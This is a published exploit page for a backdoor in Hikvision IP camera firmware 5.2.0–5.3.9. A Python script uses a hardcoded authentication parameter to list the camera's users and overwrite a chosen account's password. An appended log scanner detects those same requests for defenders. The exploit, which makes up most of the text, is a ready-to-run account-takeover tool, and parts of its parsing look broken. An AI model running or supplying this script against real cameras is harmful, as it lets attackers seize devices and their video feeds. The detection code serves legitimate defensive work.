Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Con
Source: vfocus.net  Author: Matamorphosis  Published: 2018-03-26
# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to help the owner recover their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
 
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
 
import requests
import re
import sys
 
# BASIC INFO
 
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
 
def Usage():
    print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
 
try:
    ip = sys.argv[1]
    SSL = sys.argv[3]
 
except:
    print("[-] One or more of the arguments is missing.")
    Usage()
    sys.exit()
 
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip)          # IP ADDRESS REGULAR EXPRESSION.
 
if not ipmatch:
    print("[-] The entered ip address " + ip + " is not in the correct format.")
    Usage()
    sys.exit()
 
try:
    port = int(sys.argv[2])
 
except:
    print("[-] The entered port " + sys.argv[2] + " is not a number.")
    Usage()
    sys.exit()
 
if (port == 0) or (port > 65535):
    print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
    Usage()
    sys.exit()
 
if SSL == "Y":
    protocol = "https"
 
else:
    protocol = "http"
 
URLBase = protocol + "://" + ip + ":" + str(port) + "/"                     # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg                 # DOWNLOAD REQUEST.
 
print("[+] Getting User List.")
 
DownloadResponse = requests.get(URLDownload).text
 
for line in DownloadResponse:                                               # RETRIEVING USER LIST
    useridmatch = re.search(r"<id>(.*)<\/id>", line)                        # CHECK FOR USER ID.
    usernamematch = re.search(r"<userName>(.*)<\/userName>", line)          # CHECK FOR USER NAME.
 
    if useridmatch:
        userID = useridmatch.group(1)
        print("[+] User ID: " + userID)
 
    if usernamematch:
        userName = usernamematch.group(1)
        print("[+] Username: " + userName)
 
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
 
print("[+] Using the User " + userName + ".")
 
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
 
#print(userXML)
 
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg    # UPLOAD REQUEST.
 
print("[+] Changing Password now.")
 
print requests.put(URLUpload, data=userXML).text                            # UPLOAD REQUEST, SENDING THE PAYLOAD.
 
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + " Password: " + newPass)
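
A defender-side check for the two requests this script sends, as an added example that is not part of the original exploit: it scans access logs for the `auth=YWRtaW46MTEK` query parameter and separates user-list reads from password-changing PUTs. It assumes combined-format access logs from a reverse proxy or gateway in front of the cameras; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Value the script above appends to every request (taken from the page).
BACKDOOR_AUTH = "YWRtaW46MTEK"

# Assumed log layout: ip - - [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return a finding dict if the line carries the backdoor parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs percent-decodes, so encoded variants of the value still match.
    auth_values = parse_qs(url.query, keep_blank_values=True).get("auth", [])
    if BACKDOOR_AUTH not in auth_values:
        return None
    path = url.path.lower()  # compare case-insensitively to be conservative
    if m["method"] == "PUT" and path.startswith("/security/users/"):
        kind = "credential-change"      # shape of the script's upload request
    elif path.rstrip("/") == "/security/users":
        kind = "user-enumeration"       # shape of the script's download request
    else:
        kind = "backdoor-auth-other"    # same parameter on another endpoint
    return {"src": m["src"], "time": m["ts"], "kind": kind,
            "succeeded": m["status"].startswith("2")}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [26/Mar/2018:10:00:01 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Mar/2018:10:00:09 +0000] "PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1" 200 64',
    '192.0.2.10 - - [26/Mar/2018:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '203.0.113.5 - - [26/Mar/2018:10:02:00 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `credential-change` finding with `succeeded` set means an account password on that device should be treated as changed by whoever sent the request.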
 